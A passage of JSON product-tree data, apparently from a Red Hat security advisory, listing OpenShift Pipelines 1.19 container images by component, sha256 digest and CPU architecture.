"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:f8baf73dbf01840d3926d1f259128b2595f221fa0db8e7f0ad54c0c6b2b5a532_amd64",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:01d0bac5ae68324714889caad7a6d00974a194706dd6abac16ac600c1acba486_ppc64le as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:01d0bac5ae68324714889caad7a6d00974a194706dd6abac16ac600c1acba486_ppc64le"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:01d0bac5ae68324714889caad7a6d00974a194706dd6abac16ac600c1acba486_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:39ce75c550fd693dc0bf2ded4e8d15e20e6b8ba7fe63f095d0642c44d3bf3ed5_amd64 as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:39ce75c550fd693dc0bf2ded4e8d15e20e6b8ba7fe63f095d0642c44d3bf3ed5_amd64"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:39ce75c550fd693dc0bf2ded4e8d15e20e6b8ba7fe63f095d0642c44d3bf3ed5_amd64",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:42c27a9a4546aeff7d88be0e1a3a47f23d738b3184b87c09c769fbb2b189d5b8_arm64 as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:42c27a9a4546aeff7d88be0e1a3a47f23d738b3184b87c09c769fbb2b189d5b8_arm64"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:42c27a9a4546aeff7d88be0e1a3a47f23d738b3184b87c09c769fbb2b189d5b8_arm64",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:5c786e81facc28108221a2a85e2811b145c4ac5cc0c9c5d1c8b79f518dfc42c2_s390x as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:5c786e81facc28108221a2a85e2811b145c4ac5cc0c9c5d1c8b79f518dfc42c2_s390x"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:5c786e81facc28108221a2a85e2811b145c4ac5cc0c9c5d1c8b79f518dfc42c2_s390x",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:1f3da51efb5c0f7d6ce15ad8b76641a65d6d09be940346f9b5ff833453018ed0_amd64 as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:1f3da51efb5c0f7d6ce15ad8b76641a65d6d09be940346f9b5ff833453018ed0_amd64"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:1f3da51efb5c0f7d6ce15ad8b76641a65d6d09be940346f9b5ff833453018ed0_amd64",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:2ae4928be71ff1fb0adfb8d014e079c912445a53473400881ac9299332694b80_arm64 as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:2ae4928be71ff1fb0adfb8d014e079c912445a53473400881ac9299332694b80_arm64"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:2ae4928be71ff1fb0adfb8d014e079c912445a53473400881ac9299332694b80_arm64",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:9317d326fc72e99e821a4891e115007761d326f33ee85dbfe3cc62be801d5af6_ppc64le as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:9317d326fc72e99e821a4891e115007761d326f33ee85dbfe3cc62be801d5af6_ppc64le"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:9317d326fc72e99e821a4891e115007761d326f33ee85dbfe3cc62be801d5af6_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:a4ab9fd58865390a4a6d85dc2d91505737539fb547e2b17c57cb72be0acbcf0a_s390x as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:a4ab9fd58865390a4a6d85dc2d91505737539fb547e2b17c57cb72be0acbcf0a_s390x"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:a4ab9fd58865390a4a6d85dc2d91505737539fb547e2b17c57cb72be0acbcf0a_s390x",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:1a7f6edbd72dd5e86ca19dd3b57987362dbc17aad5b4bf07eb259ada71c270c9_s390x as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:1a7f6edbd72dd5e86ca19dd3b57987362dbc17aad5b4bf07eb259ada71c270c9_s390x"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:1a7f6edbd72dd5e86ca19dd3b57987362dbc17aad5b4bf07eb259ada71c270c9_s390x",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:5bdbe4eeced5d4e13831125bb704c8d7e98cd1fd4cc335a39e204a8676f317eb_arm64 as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:5bdbe4eeced5d4e13831125bb704c8d7e98cd1fd4cc335a39e204a8676f317eb_arm64"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:5bdbe4eeced5d4e13831125bb704c8d7e98cd1fd4cc335a39e204a8676f317eb_arm64",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:887df82ba16869a9fdf336577a7f7ae9a90713dfbcaa8321f9ec45a20637cc5a_amd64 as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:887df82ba16869a9fdf336577a7f7ae9a90713dfbcaa8321f9ec45a20637cc5a_amd64"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:887df82ba16869a9fdf336577a7f7ae9a90713dfbcaa8321f9ec45a20637cc5a_amd64",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:dbf71dcf74dd47cbfc5f285640aca82afa3686e98ef32bc025dd3d047d636671_ppc64le as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:dbf71dcf74dd47cbfc5f285640aca82afa3686e98ef32bc025dd3d047d636671_ppc64le"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:dbf71dcf74dd47cbfc5f285640aca82afa3686e98ef32bc025dd3d047d636671_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:068909009a477b980a6b50396a168b1a62235dd203e63a5f11065bb053fbd89c_s390x as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:068909009a477b980a6b50396a168b1a62235dd203e63a5f11065bb053fbd89c_s390x"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:068909009a477b980a6b50396a168b1a62235dd203e63a5f11065bb053fbd89c_s390x",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:192657fb34d498d7b731e3852abf89265257f7421e1787bd8fde0019805dc823_arm64 as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:192657fb34d498d7b731e3852abf89265257f7421e1787bd8fde0019805dc823_arm64"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:192657fb34d498d7b731e3852abf89265257f7421e1787bd8fde0019805dc823_arm64",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:7b2727015d5b29531155977c8bed5422612614d694e28e8a01325340bf7a7410_amd64 as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:7b2727015d5b29531155977c8bed5422612614d694e28e8a01325340bf7a7410_amd64"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:7b2727015d5b29531155977c8bed5422612614d694e28e8a01325340bf7a7410_amd64",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:7b2e55ea36197d0e733baea29aa6671ec5b0055a1f58fabb5269d31bf04d8045_ppc64le as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:7b2e55ea36197d0e733baea29aa6671ec5b0055a1f58fabb5269d31bf04d8045_ppc64le"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:7b2e55ea36197d0e733baea29aa6671ec5b0055a1f58fabb5269d31bf04d8045_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:169b8f0623a6a15aefb7217228197218b4ab9a398cbab01348f9045599c38a57_ppc64le as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:169b8f0623a6a15aefb7217228197218b4ab9a398cbab01348f9045599c38a57_ppc64le"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:169b8f0623a6a15aefb7217228197218b4ab9a398cbab01348f9045599c38a57_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:8736b16bee608eba7c8506963419149631fe93bdf30b71c3785391e01b803ba5_amd64 as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:8736b16bee608eba7c8506963419149631fe93bdf30b71c3785391e01b803ba5_amd64"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:8736b16bee608eba7c8506963419149631fe93bdf30b71c3785391e01b803ba5_amd64",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:acbca5c8ed3a1947bea2fda696d84e799fea859e24c4f04256dc7e080fa3e1cf_arm64 as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:acbca5c8ed3a1947bea2fda696d84e799fea859e24c4f04256dc7e080fa3e1cf_arm64"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:acbca5c8ed3a1947bea2fda696d84e799fea859e24c4f04256dc7e080fa3e1cf_arm64",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:fe1af3bd9efe149c6567a5f14a5b48e2b1b9f41997b081b18cab513b59b55e87_s390x as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:fe1af3bd9efe149c6567a5f14a5b48e2b1b9f41997b081b18cab513b59b55e87_s390x"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:fe1af3bd9efe149c6567a5f14a5b48e2b1b9f41997b081b18cab513b59b55e87_s390x",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:03ff8b2feccd7a7fc5b93574042def602fa885e572919674fccb1e516bd6969f_ppc64le as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:03ff8b2feccd7a7fc5b93574042def602fa885e572919674fccb1e516bd6969f_ppc64le"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:03ff8b2feccd7a7fc5b93574042def602fa885e572919674fccb1e516bd6969f_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:28097a799be3dd6d8f500aee2d0ae2ec2a7ccc8a3d2a96a1a4f314a6621ced93_arm64 as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:28097a799be3dd6d8f500aee2d0ae2ec2a7ccc8a3d2a96a1a4f314a6621ced93_arm64"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:28097a799be3dd6d8f500aee2d0ae2ec2a7ccc8a3d2a96a1a4f314a6621ced93_arm64",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:4b0c865ca819b32dedd280dc301e719f0efa14e054dd82e43097837ef2627e3f_s390x as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:4b0c865ca819b32dedd280dc301e719f0efa14e054dd82e43097837ef2627e3f_s390x"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:4b0c865ca819b32dedd280dc301e719f0efa14e054dd82e43097837ef2627e3f_s390x",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:8fe90449d2c94b550e5cac06207d9b65a64683f0878e857cee4a24b94c1b8bf2_amd64 as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:8fe90449d2c94b550e5cac06207d9b65a64683f0878e857cee4a24b94c1b8bf2_amd64"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:8fe90449d2c94b550e5cac06207d9b65a64683f0878e857cee4a24b94c1b8bf2_amd64",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:6f879fcc0f49dd55a32a2394fb366a07fc9d53b7bf90638f7427b08e700efa1a_amd64 as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:6f879fcc0f49dd55a32a2394fb366a07fc9d53b7bf90638f7427b08e700efa1a_amd64"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:6f879fcc0f49dd55a32a2394fb366a07fc9d53b7bf90638f7427b08e700efa1a_amd64",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:96b66b1b98dc3e1f95aefcf6d0aea9aa7bb9115bcfdf8ae0206da8fe502d7a4a_s390x as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:96b66b1b98dc3e1f95aefcf6d0aea9aa7bb9115bcfdf8ae0206da8fe502d7a4a_s390x"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:96b66b1b98dc3e1f95aefcf6d0aea9aa7bb9115bcfdf8ae0206da8fe502d7a4a_s390x",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:ddbbfea6d40e0b978a0715f338aacc758c82a47df12a4ecd46c0ab9ed5bac166_ppc64le as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:ddbbfea6d40e0b978a0715f338aacc758c82a47df12a4ecd46c0ab9ed5bac166_ppc64le"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:ddbbfea6d40e0b978a0715f338aacc758c82a47df12a4ecd46c0ab9ed5bac166_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:ef9600ffab4ef449efacb7b74c982215406f74b7fc03d969f93004880c97e3ee_arm64 as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:ef9600ffab4ef449efacb7b74c982215406f74b7fc03d969f93004880c97e3ee_arm64"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:ef9600ffab4ef449efacb7b74c982215406f74b7fc03d969f93004880c97e3ee_arm64",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:1cfb56b8064232ea5e162717b07a9ea77cab7a9e62941ebbd71d95139f52b5e3_amd64 as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:1cfb56b8064232ea5e162717b07a9ea77cab7a9e62941ebbd71d95139f52b5e3_amd64"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:1cfb56b8064232ea5e162717b07a9ea77cab7a9e62941ebbd71d95139f52b5e3_amd64",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:4f8b2b98e3624a07f121a479dba5368701669f6d444a718883df6b4bf46500bf_s390x as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:4f8b2b98e3624a07f121a479dba5368701669f6d444a718883df6b4bf46500bf_s390x"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:4f8b2b98e3624a07f121a479dba5368701669f6d444a718883df6b4bf46500bf_s390x",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:5aa846a80b2fe91a9eb3ea20496ae4cdfc1f1b4d59708a320d947230cd5287c6_arm64 as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:5aa846a80b2fe91a9eb3ea20496ae4cdfc1f1b4d59708a320d947230cd5287c6_arm64"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:5aa846a80b2fe91a9eb3ea20496ae4cdfc1f1b4d59708a320d947230cd5287c6_arm64",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:6183a74cf4b9c2abbd6511cb94151308f724c85dc63aaea0ae795712f8d48254_ppc64le as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:6183a74cf4b9c2abbd6511cb94151308f724c85dc63aaea0ae795712f8d48254_ppc64le"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:6183a74cf4b9c2abbd6511cb94151308f724c85dc63aaea0ae795712f8d48254_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:563c5ae3792c319b3df29c175d7461c48cee2d453170e4285065f3c418e37df0_arm64 as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:563c5ae3792c319b3df29c175d7461c48cee2d453170e4285065f3c418e37df0_arm64"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:563c5ae3792c319b3df29c175d7461c48cee2d453170e4285065f3c418e37df0_arm64",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:58c4c251e79b007b3bffd7c8436d7b767340ad94eae70d90387d7176d4a5bdf2_amd64 as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:58c4c251e79b007b3bffd7c8436d7b767340ad94eae70d90387d7176d4a5bdf2_amd64"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:58c4c251e79b007b3bffd7c8436d7b767340ad94eae70d90387d7176d4a5bdf2_amd64",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:bf65b6fad64b2761ed6997a1cad0a6f0477b2740561011b30717d0d3f3dd6b7f_ppc64le as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:bf65b6fad64b2761ed6997a1cad0a6f0477b2740561011b30717d0d3f3dd6b7f_ppc64le"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:bf65b6fad64b2761ed6997a1cad0a6f0477b2740561011b30717d0d3f3dd6b7f_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:cdebcfc74dfb2de9d328776d07b8846b0e0394847b72c484a04003edb089cfc4_s390x as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:cdebcfc74dfb2de9d328776d07b8846b0e0394847b72c484a04003edb089cfc4_s390x"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:cdebcfc74dfb2de9d328776d07b8846b0e0394847b72c484a04003edb089cfc4_s390x",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:03423a987a3b154dd097d2f207c33928ed184aa27b884a3e3c5e56702d049f12_ppc64le as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:03423a987a3b154dd097d2f207c33928ed184aa27b884a3e3c5e56702d049f12_ppc64le"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:03423a987a3b154dd097d2f207c33928ed184aa27b884a3e3c5e56702d049f12_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:73681e67f2bad4ea91e59dc72552ab3706a72c4bb5d815be9bfc493678b68a25_arm64 as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:73681e67f2bad4ea91e59dc72552ab3706a72c4bb5d815be9bfc493678b68a25_arm64"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:73681e67f2bad4ea91e59dc72552ab3706a72c4bb5d815be9bfc493678b68a25_arm64",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:8d7567c15b6e4f6c2d9a882c172293e6cc39abad8bbea1b3b984236cac12a1f6_amd64 as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:8d7567c15b6e4f6c2d9a882c172293e6cc39abad8bbea1b3b984236cac12a1f6_amd64"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:8d7567c15b6e4f6c2d9a882c172293e6cc39abad8bbea1b3b984236cac12a1f6_amd64",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
